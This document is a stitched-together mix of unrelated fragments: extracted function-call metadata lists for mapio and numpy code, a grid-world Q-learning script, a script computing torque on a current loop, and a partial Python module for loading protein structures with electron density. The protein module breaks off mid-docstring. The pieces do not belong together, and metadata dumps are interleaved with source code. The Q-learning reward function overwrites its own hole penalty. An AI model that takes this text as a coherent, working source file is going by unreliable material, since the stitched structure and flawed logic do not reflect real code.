mapio.geodict import GeoDict\n'), ((10512, 10563), 'mapio.geodict.GeoDict.createDictFromBox', 'GeoDict.createDictFromBox', (['(0)', '(10)', '(0)', '(10)', '(0.01)', '(0.01)'], {}), '(0, 10, 0, 10, 0.01, 0.01)\n', (10537, 10563), False, 'from mapio.geodict import GeoDict\n'), ((10575, 10613), 'numpy.random.rand', 'np.random.rand', (['geodict.ny', 'geodict.nx'], {}), '(geodict.ny, geodict.nx)\n', (10589, 10613), True, 'import numpy as np\n'), ((10625, 10646), 'mapio.grid2d.Grid2D', 'Grid2D', (['data', 'geodict'], {}), '(data, geodict)\n', (10631, 10646), False, 'from mapio.grid2d import 
Grid2D\n'), ((10664, 10715), 'mapio.geodict.GeoDict.createDictFromBox', 'GeoDict.createDictFromBox', (['(2)', '(8)', '(2)', '(8)', '(0.098)', '(0.098)'], {}), '(2, 8, 2, 8, 0.098, 0.098)\n', (10689, 10715), False, 'from mapio.geodict import GeoDict\n'), ((10725, 10736), 'time.time', 'time.time', ([], {}), '()\n', (10734, 10736), False, 'import time\n'), ((10810, 10821), 'time.time', 'time.time', ([], {}), '()\n', (10819, 10821), False, 'import time\n'), ((10890, 10901), 'time.time', 'time.time', ([], {}), '()\n', (10899, 10901), False, 'import time\n'), ((11114, 11219), 'mapio.geodict.GeoDict', 'GeoDict', (["{'xmin': 0.5, 'xmax': 3.5, 'ymin': 0.5, 'ymax': 3.5, 'dx': 1.0, 'dy': 1.0,\n 'ny': 4, 'nx': 4}"], {}), "({'xmin': 0.5, 'xmax': 3.5, 'ymin': 0.5, 'ymax': 3.5, 'dx': 1.0,\n 'dy': 1.0, 'ny': 4, 'nx': 4})\n", (11121, 11219), False, 'from mapio.geodict import GeoDict\n'), ((11886, 11993), 'mapio.grid2d.Grid2D.rasterizeFromGeometry', 'Grid2D.rasterizeFromGeometry', (['shapes', 'geodict'], {'fillValue': '(0)', 'attribute': '"""value"""', 'mustContainCenter': '(False)'}), "(shapes, geodict, fillValue=0, attribute=\n 'value', mustContainCenter=False)\n", (11914, 11993), False, 'from mapio.grid2d import Grid2D\n'), ((12011, 12077), 'numpy.array', 'np.array', (['[[5, 5, 7, 7], [5, 5, 7, 7], [0, 0, 7, 7], [0, 0, 0, 7]]'], {}), '([[5, 5, 7, 7], [5, 5, 7, 7], [0, 0, 7, 7], [0, 0, 0, 7]])\n', (12019, 12077), True, 'import numpy as np\n'), ((12388, 12494), 'mapio.grid2d.Grid2D.rasterizeFromGeometry', 'Grid2D.rasterizeFromGeometry', (['shapes', 'geodict'], {'fillValue': '(0)', 'attribute': '"""value"""', 'mustContainCenter': '(True)'}), "(shapes, geodict, fillValue=0, attribute=\n 'value', mustContainCenter=True)\n", (12416, 12494), False, 'from mapio.grid2d import Grid2D\n'), ((12512, 12578), 'numpy.array', 'np.array', (['[[5, 0, 7, 0], [0, 0, 7, 7], [0, 0, 0, 7], [0, 0, 0, 0]]'], {}), '([[5, 0, 7, 0], [0, 0, 7, 7], [0, 0, 0, 7], [0, 0, 0, 0]])\n', (12520, 12578), True, 
'import numpy as np\n'), ((12883, 12988), 'mapio.geodict.GeoDict', 'GeoDict', (["{'xmin': 0.5, 'xmax': 3.5, 'ymin': 0.5, 'ymax': 3.5, 'dx': 1.0, 'dy': 1.0,\n 'ny': 4, 'nx': 4}"], {}), "({'xmin': 0.5, 'xmax': 3.5, 'ymin': 0.5, 'ymax': 3.5, 'dx': 1.0,\n 'dy': 1.0, 'ny': 4, 'nx': 4})\n", (12890, 12988), False, 'from mapio.geodict import GeoDict\n'), ((13020, 13041), 'mapio.grid2d.Grid2D', 'Grid2D', (['data', 'geodict'], {}), '(data, geodict)\n', (13026, 13041), False, 'from mapio.grid2d import Grid2D\n'), ((13257, 13362), 'mapio.geodict.GeoDict', 'GeoDict', (["{'xmin': 0.5, 'xmax': 3.5, 'ymin': 0.5, 'ymax': 3.5, 'dx': 1.0, 'dy': 1.0,\n 'ny': 4, 'nx': 4}"], {}), "({'xmin': 0.5, 'xmax': 3.5, 'ymin': 0.5, 'ymax': 3.5, 'dx': 1.0,\n 'dy': 1.0, 'ny': 4, 'nx': 4})\n", (13264, 13362), False, 'from mapio.geodict import GeoDict\n'), ((13394, 13415), 'mapio.grid2d.Grid2D', 'Grid2D', (['data', 'geodict'], {}), '(data, geodict)\n', (13400, 13415), False, 'from mapio.grid2d import Grid2D\n'), ((13424, 13439), 'numpy.ones', 'np.ones', (['(4, 4)'], {}), '((4, 4))\n', (13431, 13439), True, 'import numpy as np\n'), ((14122, 14225), 'mapio.geodict.GeoDict', 'GeoDict', (["{'xmin': -180, 'xmax': 120, 'ymin': -90, 'ymax': 90, 'dx': 60, 'dy': 45,\n 'nx': 6, 'ny': 5}"], {}), "({'xmin': -180, 'xmax': 120, 'ymin': -90, 'ymax': 90, 'dx': 60, 'dy':\n 45, 'nx': 6, 'ny': 5})\n", (14129, 14225), False, 'from mapio.geodict import GeoDict\n'), ((14416, 14457), 'mapio.grid2d.Grid2D.getDataRange', 'Grid2D.getDataRange', (['normal_dict', 'sample1'], {}), '(normal_dict, sample1)\n', (14435, 14457), False, 'from mapio.grid2d import Grid2D\n'), ((14676, 14717), 'mapio.grid2d.Grid2D.getDataRange', 'Grid2D.getDataRange', (['normal_dict', 'sample2'], {}), '(normal_dict, sample2)\n', (14695, 14717), False, 'from mapio.grid2d import Grid2D\n'), ((15028, 15069), 'mapio.grid2d.Grid2D.getDataRange', 'Grid2D.getDataRange', (['normal_dict', 'sample3'], {}), '(normal_dict, sample3)\n', (15047, 15069), False, 'from 
mapio.grid2d import Grid2D\n'), ((15360, 15401), 'mapio.grid2d.Grid2D.getDataRange', 'Grid2D.getDataRange', (['normal_dict', 'sample4'], {}), '(normal_dict, sample4)\n', (15379, 15401), False, 'from mapio.grid2d import Grid2D\n'), ((15692, 15733), 'mapio.grid2d.Grid2D.getDataRange', 'Grid2D.getDataRange', (['normal_dict', 'sample5'], {}), '(normal_dict, sample5)\n', (15711, 15733), False, 'from mapio.grid2d import Grid2D\n'), ((15925, 15978), 'mapio.geodict.GeoDict.createDictFromBox', 'GeoDict.createDictFromBox', (['(175)', '(-175)', '(-5)', '(5)', '(1.0)', '(1.0)'], {}), '(175, -175, -5, 5, 1.0, 1.0)\n', (15950, 15978), False, 'from mapio.geodict import GeoDict\n'), ((16073, 16091), 'mapio.gdal.GDALGrid', 'GDALGrid', (['data', 'gd'], {}), '(data, gd)\n', (16081, 16091), False, 'from mapio.gdal import GDALGrid, get_affine\n'), ((16219, 16239), 'pyproj.Proj', 'pyproj.Proj', (['projstr'], {}), '(projstr)\n', (16230, 16239), False, 'import pyproj\n'), ((16713, 16829), 'numpy.array', 'np.array', (['[[0, 0, 1, 0, 0], [0, 0, 1, 0, 0], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0], [0, 0,\n 1, 0, 0]]'], {'dtype': 'np.int32'}), '([[0, 0, 1, 0, 0], [0, 0, 1, 0, 0], [1, 1, 1, 1, 1], [0, 0, 1, 0, 0\n ], [0, 0, 1, 0, 0]], dtype=np.int32)\n', (16721, 16829), True, 'import numpy as np\n'), ((17040, 17056), 'mapio.geodict.GeoDict', 'GeoDict', (['geodict'], {}), '(geodict)\n', (17047, 17056), False, 'from mapio.geodict import GeoDict\n'), ((17068, 17086), 'mapio.gdal.GDALGrid', 'GDALGrid', (['data', 'gd'], {}), '(data, gd)\n', (17076, 17086), False, 'from mapio.gdal import GDALGrid, get_affine\n'), ((6803, 6820), 'numpy.array', 'np.array', (['[13, 8]'], {}), '([13, 8])\n', (6811, 6820), True, 'import numpy as np\n'), ((7028, 7055), 'numpy.array', 'np.array', (['[[13, 8], [9, 4]]'], {}), '([[13, 8], [9, 4]])\n', (7036, 7055), True, 'import numpy as np\n'), ((9527, 9548), 'mapio.grid2d.Grid2D', 'Grid2D', (['data', 'geodict'], {}), '(data, geodict)\n', (9533, 9548), False, 'from mapio.grid2d 
import Grid2D\n'), ((9570, 9675), 'mapio.geodict.GeoDict', 'GeoDict', (["{'xmin': 3.0, 'xmax': 4.0, 'ymin': 3.0, 'ymax': 4.0, 'dx': 1.0, 'dy': 1.0,\n 'ny': 2, 'nx': 2}"], {}), "({'xmin': 3.0, 'xmax': 4.0, 'ymin': 3.0, 'ymax': 4.0, 'dx': 1.0,\n 'dy': 1.0, 'ny': 2, 'nx': 2})\n", (9577, 9675), False, 'from mapio.geodict import GeoDict\n'), ((13627, 13642), 'numpy.ones', 'np.ones', (['(5, 5)'], {}), '((5, 5))\n', (13634, 13642), True, 'import numpy as np\n'), ((17253, 17271), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (17269, 17271), False, 'import tempfile\n'), ((17290, 17322), 'os.path.join', 'os.path.join', (['tdir', '"""output.bil"""'], {}), "(tdir, 'output.bil')\n", (17302, 17322), False, 'import os\n'), ((18567, 18586), 'shutil.rmtree', 'shutil.rmtree', (['tdir'], {}), '(tdir)\n', (18580, 18586), False, 'import shutil\n'), ((1144, 1159), 'numpy.arange', 'np.arange', (['(0)', '(4)'], {}), '(0, 4)\n', (1153, 1159), True, 'import numpy as np\n'), ((2199, 2214), 'numpy.arange', 'np.arange', (['(0)', '(9)'], {}), '(0, 9)\n', (2208, 2214), True, 'import numpy as np\n'), ((6300, 6316), 'numpy.arange', 'np.arange', (['(1)', '(26)'], {}), '(1, 26)\n', (6309, 6316), True, 'import numpy as np\n'), ((7227, 7243), 'numpy.arange', 'np.arange', (['(0)', '(25)'], {}), '(0, 25)\n', (7236, 7243), True, 'import numpy as np\n'), ((7695, 7711), 'numpy.arange', 'np.arange', (['(0)', '(84)'], {}), '(0, 84)\n', (7704, 7711), True, 'import numpy as np\n'), ((9363, 9380), 'numpy.arange', 'np.arange', (['(14)', '(56)'], {}), '(14, 56)\n', (9372, 9380), True, 'import numpy as np\n'), ((9941, 9979), 'numpy.array', 'np.array', (['[[30.0, 31.0], [37.0, 38.0]]'], {}), '([[30.0, 31.0], [37.0, 38.0]])\n', (9949, 9979), True, 'import numpy as np\n'), ((11661, 11675), 'shapely.geometry.Polygon', 'Polygon', (['poly1'], {}), '(poly1)\n', (11668, 11675), False, 'from shapely.geometry import MultiPoint, Polygon, mapping\n'), ((11740, 11754), 'shapely.geometry.Polygon', 'Polygon', 
(['poly2'], {}), '(poly2)\n', (11747, 11754), False, 'from shapely.geometry import MultiPoint, Polygon, mapping\n'), ((16017, 16039), 'numpy.arange', 'np.arange', (['(0.0)', 'ncells'], {}), '(0.0, ncells)\n', (16026, 16039), True, 'import numpy as np\n'), ((17363, 17385), 'rasterio.open', 'rasterio.open', (['outfile'], {}), '(outfile)\n', (17376, 17385), False, 'import rasterio\n'), ((17412, 17427), 'mapio.gdal.get_affine', 'get_affine', (['src'], {}), '(src)\n', (17422, 17427), False, 'from mapio.gdal import GDALGrid, get_affine\n'), ((17780, 17869), 'rasterio.warp.calculate_default_transform', 'calculate_default_transform', (['src_crs', 'dst_crs', 'ncols', 'nrows', 'left', 'bottom', 'right', 'top'], {}), '(src_crs, dst_crs, ncols, nrows, left, bottom,\n right, top)\n', (17807, 17869), False, 'from rasterio.warp import reproject, Resampling, calculate_default_transform\n'), ((18105, 18130), 'numpy.zeros', 'np.zeros', (['(height, width)'], {}), '((height, width))\n', (18113, 18130), True, 'import numpy as np\n'), ((18143, 18334), 'rasterio.warp.reproject', 'reproject', (['data', 'destination'], {'src_transform': 'aff', 'src_crs': 'src_crs', 'dst_transform': 'dst_transform', 'dst_crs': 'dst_crs', 'src_nodata': 'src.nodata', 'dst_nodata': 'np.nan', 'resampling': 'Resampling.nearest'}), '(data, destination, src_transform=aff, src_crs=src_crs,\n dst_transform=dst_transform, dst_crs=dst_crs, src_nodata=src.nodata,\n dst_nodata=np.nan, resampling=Resampling.nearest)\n', (18152, 18334), False, 'from rasterio.warp import reproject, Resampling, calculate_default_transform\n'), ((10034, 10072), 'numpy.array', 'np.array', (['[[34.0, 35.0], [41.0, 42.0]]'], {}), '([[34.0, 35.0], [41.0, 42.0]])\n', (10042, 10072), True, 'import numpy as np\n'), ((5065, 5081), 'numpy.arange', 'np.arange', (['(0)', '(16)'], {}), '(0, 16)\n', (5074, 5081), True, 'import numpy as np\n'), ((8723, 8739), 'numpy.arange', 'np.arange', (['(0)', '(35)'], {}), '(0, 35)\n', (8732, 8739), True, 'import 
numpy as np\n'), ((10122, 10160), 'numpy.array', 'np.array', (['[[34.0, 35.0], [41.0, 42.0]]'], {}), '([[34.0, 35.0], [41.0, 42.0]])\n', (10130, 10160), True, 'import numpy as np\n'), ((12819, 12835), 'numpy.arange', 'np.arange', (['(0)', '(16)'], {}), '(0, 16)\n', (12828, 12835), True, 'import numpy as np\n'), ((13193, 13209), 'numpy.arange', 'np.arange', (['(0)', '(16)'], {}), '(0, 16)\n', (13202, 13209), True, 'import numpy as np\n'), ((17481, 17486), 'rasterio.crs.CRS', 'CRS', ([], {}), '()\n', (17484, 17486), False, 'from rasterio.crs import CRS\n'), ((17554, 17559), 'rasterio.crs.CRS', 'CRS', ([], {}), '()\n', (17557, 17559), False, 'from rasterio.crs import CRS\n')] |
import numpy as np
from map import Map
from agent import Agent
import matplotlib.pyplot as plt
def decide_action(next_state, episode, q_table):
    """Pick the next action with a fixed-epsilon greedy policy.

    With probability (1 - epsilon) the highest-Q action for ``next_state``
    is exploited; otherwise one of the 4 moves is drawn at random.
    ``episode`` is accepted for interface compatibility but unused here.
    """
    epsilon = 0.5
    # epsilon-greedy policy: a single uniform draw decides explore vs. exploit
    draw = np.random.uniform(0, 1)
    if draw < epsilon:
        # explore: uniformly random action among the four moves
        return np.random.choice(range(4))
    # exploit: greedy action for the given state
    return np.argmax(q_table[next_state])
def q_update(q_table, state, action, reward, next_state):
    """One tabular Q-learning update; mutates ``q_table`` in place and returns it."""
    gamma = 0.9  # discount factor
    alpha = 0.7  # learning rate
    # TD target: immediate reward plus discounted best value of the next state
    best_next = max(q_table[next_state])
    td_target = reward + gamma * best_next
    q_table[state, action] = (1 - alpha) * q_table[state, action] + alpha * td_target
    return q_table
def reward(end_or_yet, state, next_state, _map):
    """Reward for one Q-learning transition on the grid map.

    Parameters
    ----------
    end_or_yet : bool
        True when the episode just terminated.
    state, next_state : int
        Flattened cell indices (row * 13 + col).
    _map : 2-D array
        Grid map; cells equal to 3 are holes.  The ``12 - j`` flip below
        assumes a 13x13 map -- TODO confirm against Map.

    Returns
    -------
    int : 300/100/20 for the three goals, -80 for standing on a hole,
          -10 for bumping into a wall (state unchanged), -1 otherwise.
    """
    # Collect hole coordinates (map value 3), using the same vertical flip
    # the original map layout uses.
    holes = []
    for i in range(_map.shape[0]):
        for j in range(_map.shape[1]):
            if _map[12 - j][i] == 3:
                holes.append([12 - j, i])
    # Convert flattened indices to [row, col] coordinates.
    state_ = [state // 13, state % 13]
    next_state_ = [next_state // 13, next_state % 13]
    # BUG FIX: previously the -80 hole penalty (and the for-else reward of 1)
    # was computed first and then unconditionally overwritten by the
    # if/elif/else chain below, so falling into a hole was never penalized.
    # Check the hole first and return immediately.
    if state_ in holes:
        return -80
    if end_or_yet and next_state_ == [11, 11]:
        return 300
    elif end_or_yet and next_state_ == [11, 2]:
        return 100
    elif end_or_yet and next_state_ == [6, 11]:
        return 20
    elif state == next_state:
        return -10
    return -1
def graph(reward_list, max_episode):
    """Plot total reward per episode (episodes numbered from 1) and show it."""
    episodes = list(range(1, max_episode + 1))
    fig = plt.figure()
    axes = fig.add_subplot(111)
    axes.plot(episodes, reward_list, label="reward_transition")
    plt.legend()
    plt.show()
def main():
    """Train a tabular Q-learning agent on the grid map, then plot rewards."""
    env = Map()
    agent = Agent()
    max_episode = 100
    num_step = 300
    # One Q-row per cell of the square map, one column per action,
    # initialised uniformly in [-1, 1).
    q_table = np.random.uniform(low=-1, high=1, size=(env.size**2, agent.action_space))
    reward_list = []
    for episode in range(max_episode):
        agent = Agent(env.init_pos)  # reset the agent each episode
        state = agent.get_state()
        action = np.argmax(q_table[state])  # greedy first action
        total = 0
        # step loop
        for step in range(num_step):
            allowed = env.check_move(agent.pos)
            agent.action(action, allowed)
            done = agent.check_done()
            next_state = agent.get_state()
            r = reward(done, state, next_state, env.map)
            total += r
            q_table = q_update(q_table, state, action, r, next_state)
            action = decide_action(next_state, episode, q_table)
            state = next_state
            env.plot(agent.pos, q_table)
            if done:
                break
        reward_list.append(total)
        print("episode %5d, reward %6d, step %5d" %(episode+1,total,step+1))
    graph(reward_list, max_episode)
# Script entry point: run training only when executed directly, not on import.
if __name__ == '__main__':
    main()
| [
"numpy.random.uniform",
"matplotlib.pyplot.show",
"numpy.argmax",
"matplotlib.pyplot.legend",
"map.Map",
"matplotlib.pyplot.figure",
"agent.Agent"
] | [((1503, 1515), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (1513, 1515), True, 'import matplotlib.pyplot as plt\n'), ((1617, 1629), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (1627, 1629), True, 'import matplotlib.pyplot as plt\n'), ((1634, 1644), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1642, 1644), True, 'import matplotlib.pyplot as plt\n'), ((1674, 1679), 'map.Map', 'Map', ([], {}), '()\n', (1677, 1679), False, 'from map import Map\n'), ((1692, 1699), 'agent.Agent', 'Agent', ([], {}), '()\n', (1697, 1699), False, 'from agent import Agent\n'), ((1755, 1840), 'numpy.random.uniform', 'np.random.uniform', ([], {'low': '(-1)', 'high': '(1)', 'size': '(map_init.size ** 2, agent.action_space)'}), '(low=-1, high=1, size=(map_init.size ** 2, agent.action_space)\n )\n', (1772, 1840), True, 'import numpy as np\n'), ((196, 219), 'numpy.random.uniform', 'np.random.uniform', (['(0)', '(1)'], {}), '(0, 1)\n', (213, 219), True, 'import numpy as np\n'), ((242, 272), 'numpy.argmax', 'np.argmax', (['q_table[next_state]'], {}), '(q_table[next_state])\n', (251, 272), True, 'import numpy as np\n'), ((1911, 1935), 'agent.Agent', 'Agent', (['map_init.init_pos'], {}), '(map_init.init_pos)\n', (1916, 1935), False, 'from agent import Agent\n'), ((1994, 2019), 'numpy.argmax', 'np.argmax', (['q_table[state]'], {}), '(q_table[state])\n', (2003, 2019), True, 'import numpy as np\n')] |
#!/Users/robertpoenaru/.pyenv/shims/python
import numpy as np
import matplotlib.pyplot as plt
from numpy import random as rd
# Physical parameters of the current-carrying coil; collected into PARAM_SET below.
N_COILS = 3 # number of turns in the coil (integer)
RADIUS = 3 # centimetres -- converted to metres inside MU()
CURRENT = 5 # amperes
B_FIELD = 2.5 # tesla -- external field magnitude
# ANGLE BETWEEN THE MAGNETIC MOMENT OF THE LOOP AND THE MAGNETIC FIELD B
THETA = 30.0 # NOTE(review): labelled radians originally, but T() passes it through Rad(), so it is degrees -- confirm
def Rad(angle):
    """Convert an angle from degrees to radians."""
    in_radians = angle * np.pi / 180.0
    return float(in_radians)
def Area(radius):
    """Area of a circle with the given radius (same length units, squared)."""
    radius_squared = np.power(radius, 2)
    return float(radius_squared * np.pi)
# Compute the magnetic moment (magnetic dipole) of the current carrying loop
def MU(PARAMS):
    """Magnetic dipole moment of the coil.

    PARAMS = [n_coils, radius_cm, current_A, ...].  The radius is converted
    from centimetres to metres before the loop area is computed.  The moment
    is proportional to the current times the enclosed area, times the number
    of turns.
    """
    n_coils = PARAMS[0]
    radius_m = PARAMS[1] * 0.01  # cm -> m
    current = PARAMS[2]
    # magnetic moment of a single loop
    single_loop_moment = Area(radius_m) * current
    # magnetic moment of the entire coil
    mu = n_coils * single_loop_moment
    print(f'The magnetic moment is: µ= {mu}')
    return mu
# Calculate the torque that is exerted by the magnetic field on the magnetic moment of the loop.
# Torque will start to align the magnetic moment of the loop with the field itself
def T(PARAMS):
    """Torque magnitude |mu x B| = mu * B * sin(theta) acting on the coil.

    PARAMS[3] is the field magnitude in tesla; PARAMS[4] is the angle between
    the magnetic moment and the field, given in degrees (Rad converts it).
    """
    field = float(PARAMS[3])
    theta_rad = float(Rad(PARAMS[4]))
    T = MU(PARAMS) * field * np.sin(theta_rad)
    print(f'The torque applied on the current carrying loop is T= {T}')
    return T
# Compute the radius of the trajectory of a charged particle moving inside a magnetic field with constant magnitude
def R(MASS, CHARGE, SPEED, B_FIELD):
    """Gyroradius r = m*v / (q*B) of a charge moving in a uniform field."""
    momentum = MASS * SPEED
    R = momentum / (CHARGE * B_FIELD)
    print(f'The radius of the particle trajectory is R= {R}')
    return R
# Demo: plot torque vs. dipole moment at one fixed angle, then torque vs.
# angle for one fixed dipole; both figures are written to PDF files.
PARAM_SET = [N_COILS, RADIUS, CURRENT, B_FIELD, THETA]
# print(MU(PARAM_SET))
# print(T(PARAM_SET))
# print(R(1, 1, 1, 1))
# Angles from -120 to 120 degrees in 2.5-degree steps, converted to radians.
interval = np.arange(-120, 120, 2.5)
alphas = list(map(lambda x: x * np.pi / 180.0, interval))
sines = np.sin(alphas)
# One random current in [1, 5) amperes per angle sample.
currents = rd.uniform(1, 5, len(interval))
# areas = list(map(lambda x: 0.30 * x, currents))
AREA = 3.44
dipoles = list(map(lambda I: round(I * AREA, 3), currents))
B_Field = 2.5
# sines[30] is the sine at the fixed angle -120 + 30*2.5 = -45 degrees.
torques = [-x * sines[30] * B_Field for x in dipoles]
print(torques)
plt.plot(dipoles, torques, '-r', label='torques')
plt.savefig('torques.pdf', dpi=500, bbox_inches='tight')
plt.close()
# Sweep the angle while holding the first dipole moment fixed.
angled_torques = [-B_Field * dipoles[0] * sine for sine in sines]
print(angled_torques)
plt.plot(sines, angled_torques, '-r', label='angled-torques')
plt.savefig('angled_torques.pdf', dpi=500, bbox_inches='tight')
plt.close()
| [
"matplotlib.pyplot.plot",
"matplotlib.pyplot.close",
"numpy.power",
"numpy.sin",
"numpy.arange",
"matplotlib.pyplot.savefig"
] | [((1723, 1748), 'numpy.arange', 'np.arange', (['(-120)', '(120)', '(2.5)'], {}), '(-120, 120, 2.5)\n', (1732, 1748), True, 'import numpy as np\n'), ((1817, 1831), 'numpy.sin', 'np.sin', (['alphas'], {}), '(alphas)\n', (1823, 1831), True, 'import numpy as np\n'), ((2085, 2134), 'matplotlib.pyplot.plot', 'plt.plot', (['dipoles', 'torques', '"""-r"""'], {'label': '"""torques"""'}), "(dipoles, torques, '-r', label='torques')\n", (2093, 2134), True, 'import matplotlib.pyplot as plt\n'), ((2135, 2191), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""torques.pdf"""'], {'dpi': '(500)', 'bbox_inches': '"""tight"""'}), "('torques.pdf', dpi=500, bbox_inches='tight')\n", (2146, 2191), True, 'import matplotlib.pyplot as plt\n'), ((2192, 2203), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (2201, 2203), True, 'import matplotlib.pyplot as plt\n'), ((2295, 2356), 'matplotlib.pyplot.plot', 'plt.plot', (['sines', 'angled_torques', '"""-r"""'], {'label': '"""angled-torques"""'}), "(sines, angled_torques, '-r', label='angled-torques')\n", (2303, 2356), True, 'import matplotlib.pyplot as plt\n'), ((2357, 2420), 'matplotlib.pyplot.savefig', 'plt.savefig', (['"""angled_torques.pdf"""'], {'dpi': '(500)', 'bbox_inches': '"""tight"""'}), "('angled_torques.pdf', dpi=500, bbox_inches='tight')\n", (2368, 2420), True, 'import matplotlib.pyplot as plt\n'), ((2421, 2432), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (2430, 2432), True, 'import matplotlib.pyplot as plt\n'), ((1211, 1224), 'numpy.sin', 'np.sin', (['theta'], {}), '(theta)\n', (1217, 1224), True, 'import numpy as np\n'), ((422, 441), 'numpy.power', 'np.power', (['radius', '(2)'], {}), '(radius, 2)\n', (430, 441), True, 'import numpy as np\n')] |
#!/l_mnt/python/envs/teaching/bin/python3
#import Bio.PDB as bio
import pandas as pd
import numpy as np
import Geometry.GeoAtom as atm
import Geometry.GeoDensity as den
import Geometry.GeoCalcs as calcs
'''
singleton object to manage only loading pdbs once
https://python-3-patterns-idioms-test.readthedocs.io/en/latest/Singleton.html
'''
class GeoPdbs:
    """Singleton cache of GeoPdb objects so each pdb is only loaded once.

    Follows the inner-class singleton pattern:
    https://python-3-patterns-idioms-test.readthedocs.io/en/latest/Singleton.html
    All constructions share one ``__GeoPdbs`` instance; only the first
    constructor's arguments take effect.
    """
    class __GeoPdbs:
        def __init__(self, pdbDirectory, edDirectory, ed=True, dssp=True, keepDisordered=True, badAtoms=None):
            '''
            :param pdbDirectory: directory holding the pdb files
            :param edDirectory: directory holding the electron density files
            :param ed: whether to load electron density data
            :param dssp: whether to apply dssp secondary structure
            :param keepDisordered: whether to keep disordered atoms
            :param badAtoms: atom ids to exclude when gathering atoms
            '''
            self.pdbs = {}
            self.pdbDirectory = pdbDirectory
            self.edDirectory = edDirectory
            self.ed = ed
            self.dssp = dssp
            self.keepDisordered = keepDisordered
            # BUG FIX: was a mutable default argument (badAtoms=[]), which is
            # shared across calls in Python; use None as the sentinel instead.
            self.badAtoms = [] if badAtoms is None else badAtoms

        def __getPdb__(self, pdbCode):
            return self.pdbs[pdbCode]

        def __existsPdb__(self, pdbCode):
            return pdbCode in self.pdbs

        def __addPdb__(self, pdbCode, pdb):
            self.pdbs[pdbCode] = pdb

        def __clear__(self):
            self.pdbs.clear()

    instance = None

    def __init__(self, pdbDirectory, edDirectory, ed=True, dssp=True, keepDisordered=True, badAtoms=None):
        # Only the very first construction creates the shared instance; later
        # constructor arguments are ignored (singleton behaviour).
        if not GeoPdbs.instance:
            GeoPdbs.instance = GeoPdbs.__GeoPdbs(pdbDirectory, edDirectory, ed, dssp, keepDisordered, badAtoms)

    def clear(self):
        """Drop every cached pdb and reset the singleton."""
        self.instance.__clear__()
        GeoPdbs.instance = None

    def existsPdb(self, pdbCode):
        """True when the (case-insensitive) pdb code is already cached."""
        pdbCode = pdbCode.lower()
        return self.instance.__existsPdb__(pdbCode)

    def getPdb(self, pdbCode, useAll):
        """Return the cached GeoPdb for ``pdbCode``, loading it on first access."""
        pdbCode = pdbCode.lower()
        if self.instance.__existsPdb__(pdbCode):
            return self.instance.__getPdb__(pdbCode)
        else:
            gp = GeoPdb(pdbCode, self.instance.pdbDirectory, self.instance.edDirectory,
                        self.instance.ed, self.instance.dssp, self.instance.keepDisordered,
                        self.instance.badAtoms, useAll)
            self.instance.__addPdb__(pdbCode, gp)
            return gp
class GeoPdb:
    def __init__(self,pdbCode,pdbDataPath,edDataPath,ed,dssp,keepDisordered,badAtoms,useAll):
        """Load a pdb structure (and optionally its electron density and dssp).

        :param pdbCode: 4-letter pdb id (lower-cased); 'ghost' loads a stand-in
        :param pdbDataPath: directory holding 'pdb<code>.ent' files
        :param edDataPath: directory holding the electron density data
        :param ed: when True, attempt to load electron density via GeoDensity
        :param dssp: when True, annotate atoms with dssp secondary structure
        :param keepDisordered: keep disordered atoms (select conformer 'A')
        :param badAtoms: atom ids to exclude while gathering atoms
        :param useAll: include all residues, not just the amino-acid list
        """
        pdbCode = pdbCode.lower()
        self.pdbCode = pdbCode
        self.pdbDataPath= pdbDataPath
        self.hasDensity = False
        self.hasPDB = False
        self.atoms = []      # protein (amino-acid) atoms
        self.hetatms = []    # hetero atoms other than water
        self.water = []      # HOH atoms
        self.densCSV = pd.DataFrame()
        self.hasDssp = dssp
        self.dataFrame = pd.DataFrame()
        self.ghost = False
        self.useAll = useAll
        self.keepDisordered = keepDisordered
        self.badAtoms = badAtoms
        self.averageBfactor = 0
        # Ghost mode: temporarily swap in a placeholder structure (4rek) with
        # no density and no dssp, restoring the 'ghost' code afterwards.
        if self.pdbCode == 'ghost':
            self.ghost = True
            #self.pdbCode = '2q1j'
            self.pdbCode = '4rek'
            self.hasDensity = False
            self.hasDssp = False
        else:
            if ed:
                self.geoDen = den.GeoDensity(pdbCode, 'fifty', pdbDataPath, edDataPath)
                self.hasDensity = self.geoDen.valid
            else:
                self.hasDensity = False
        # Gather atoms first; dssp annotation only makes sense when that worked.
        if self.__gatherAtoms():
            if self.hasDssp:
                self.__applyDssp()
        #self.createDataStructure()
        if self.ghost == True:
            self.pdbCode = 'ghost'
def createDataStructure(self):
#print('PSU: create data structure',self.pdbCode)
dicdfs = []
for atom in self.atoms:
dic={ 'pdbCode':atom.values['pdbCode'],'resolution':atom.values['resolution'],
'chain':atom.values['chain'], 'rid':atom.values['rid'],'ridx':atom.values['ridx'],
'dssp':atom.values['dssp'], 'aa':atom.values['aa'],
'atom':atom.values['atom'], 'atomNo':atom.values['atomNo'],
'electrons':atom.values['electrons'], 'element':atom.values['element'],
'x':atom.values['x'], 'y':atom.values['y'], 'z':atom.values['z'],
'bfactor':atom.values['bfactor'], 'occupant':atom.values['occupant'],
'occupancy':atom.values['occupancy'],
'2FoFc':atom.values['2FoFc'], 'FoFc':atom.values['FoFc'],
'Fo':atom.values['Fo'], 'Fc':atom.values['Fc']}
dicdfs.append(dic)
self.dataFrame = pd.DataFrame.from_dict(dicdfs)
def getDataFrame(self):
#if self.dataFrame == None:
if self.dataFrame.empty:
self.createDataStructure()
return self.dataFrame
def getDensitySquare(self,squares,Fos,Fcs,interp,differ,degree):
xsq = squares[0]
ysq = squares[1]
zsq = squares[2]
x,y = xsq.shape
squ = np.zeros((x,y))
for i in range(0,x):
for j in range(0, y):
a,b,c = xsq[i,j],ysq[i,j],zsq[i,j]
den = self.geoDen.getInterpolatedDensity(a,b,c,Fos,Fcs,interp,differ,degree)
squ[i,j] = den
return squ
#########################################################################################################################
## PRIVATE FUNCTIONS FOR THE CLASS
#########################################################################################################################
    def __gatherAtoms(self):
        """Parse the pdb file with BioPython and populate the atom lists.

        Fills ``self.atoms`` (amino acids), ``self.water`` (HOH) and
